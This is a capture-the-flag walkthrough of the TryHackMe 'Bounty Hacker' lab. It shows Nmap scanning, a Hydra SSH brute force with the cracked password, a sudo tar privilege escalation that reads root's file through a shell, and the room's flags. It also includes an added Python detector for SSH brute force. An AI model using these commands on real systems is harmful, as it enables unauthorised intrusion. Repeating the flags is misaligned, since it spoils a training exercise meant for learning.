
The Bounty Hacker room on TryHackMe is an excellent challenge for beginners to practice using common penetration testing tools such as Nmap, FTP, SSH, and Hydra. It also provides a solid introduction to privilege escalation techniques, using sudo privileges and tools like tar for root access.
If you’re looking to improve your skills in hacking and penetration testing, this room is a great starting point.
Finding Open Ports on the Machine
We start by running a standard Nmap scan to identify open ports and services running on the target machine.
kali@kali:~$ nmap -sC -sV -A 10.10.14.83
The Nmap output reveals several common services running on the target:
- FTP on port 21 (vsftpd 3.0.3)
- SSH on port 22 (OpenSSH 7.2p2)
- HTTP on port 80 (Apache 2.4.18)
Summary:
- Ports discovered: 21 (FTP), 22 (SSH), 80 (HTTP)
Who Wrote the Task List?
Next, we connect to the FTP service as the anonymous user to explore available files.
kali@kali:~$ ftp 10.10.14.83
We successfully log in and list the files:
ftp> ls
-rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt
ftp> mget *
We download both files to investigate further:
- task.txt contains the following message:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
The task list was written by lin.
Answer:
- Who wrote the task list?
lin
What Service Can You Bruteforce with the Text File Found?
Looking at the contents of locks.txt, we can see multiple password variations for lin:
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
...
ReDSynd1ca7e
We now have a potential password list for lin, and we will use Hydra to brute-force the SSH service.
Bruteforce SSH with Hydra:
kali@kali:/tmp$ hydra -l lin -P locks.txt ssh://10.10.14.83
Hydra successfully cracks lin’s SSH password:
[22][ssh] host: 10.10.14.83 login: lin password: RedDr4gonSynd1cat3
Answer:
- What service can you bruteforce?
ssh
- What is the user’s password?
RedDr4gonSynd1cat3
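From the defender's side, the Hydra run above appears in the sshd log as a burst of failed password attempts for lin from one address, followed by an accepted login. The following Python detection is an added example, not part of the original write-up; the log lines are constructed, the addresses come from documentation ranges, and the threshold of 5 failures is an assumption.

```python
import re
from collections import defaultdict

# Constructed sshd log lines (not captured from the room).
# 192.0.2.0/24 and 198.51.100.0/24 are reserved documentation ranges.
SAMPLE_LOG = "\n".join(
    # Burst of six failures for lin from one source, then a success.
    [f"Jun  7 22:01:0{i} bountyhacker sshd[120{i}]: Failed password for lin "
     f"from 192.0.2.10 port 4031{i} ssh2" for i in range(6)]
    + ["Jun  7 22:01:07 bountyhacker sshd[1207]: Accepted password for lin "
       "from 192.0.2.10 port 40400 ssh2",
       # A user mistyping twice before logging in: should not alert.
       "Jun  7 22:05:01 bountyhacker sshd[1301]: Failed password for lin "
       "from 192.0.2.77 port 50100 ssh2",
       "Jun  7 22:05:04 bountyhacker sshd[1302]: Failed password for lin "
       "from 192.0.2.77 port 50101 ssh2",
       "Jun  7 22:05:09 bountyhacker sshd[1303]: Accepted password for lin "
       "from 192.0.2.77 port 50102 ssh2",
       # Below-threshold noise against a nonexistent account.
       "Jun  7 22:09:00 bountyhacker sshd[1401]: Failed password for invalid "
       "user admin from 198.51.100.4 port 5555 ssh2"]
)

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5):
    """Flag (ip, user) pairs with >= threshold consecutive failed passwords.
    'compromised' is True when an accepted login follows the burst."""
    failures = defaultdict(int)
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                alerts.setdefault(key, {"compromised": False})["failures"] = failures[key]
        elif key in alerts:
            alerts[key]["compromised"] = True   # guessing succeeded
        else:
            failures[key] = 0                   # ordinary login resets the count
    return alerts
```

The check counts only per source address and account and ignores timestamps, so a production rule would add a time window.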
User Flag
We now have SSH access as lin. We connect to the machine via SSH:
kali@kali:/data/tmp$ ssh lin@10.10.14.83
After logging in, we navigate to the Desktop and find the user.txt flag:
lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}
User Flag:
- User flag:
THM{CR1M3_SyNd1C4T3}
Root Flag
To escalate our privileges, we check the privileges for lin using the sudo command:
lin@bountyhacker:~/Desktop$ sudo -l
We discover that lin can run tar as root:
User lin may run the following commands on bountyhacker:
(root) /bin/tar
Because lin can run tar as root through sudo, we can use the file-read technique documented on GTFOBins to read the root flag. The command looks like this:
lin@bountyhacker:~/Desktop$ LFILE=/root/root.txt
lin@bountyhacker:~/Desktop$ sudo tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
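Here tar runs as root and hands /root/root.txt to the program given with -I (normally a decompressor), which in this case is a shell that copies its input to stderr. The file's contents are printed, and we see the root flag: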
Root Flag:
- Root flag:
THM{80UN7Y_h4cK3r}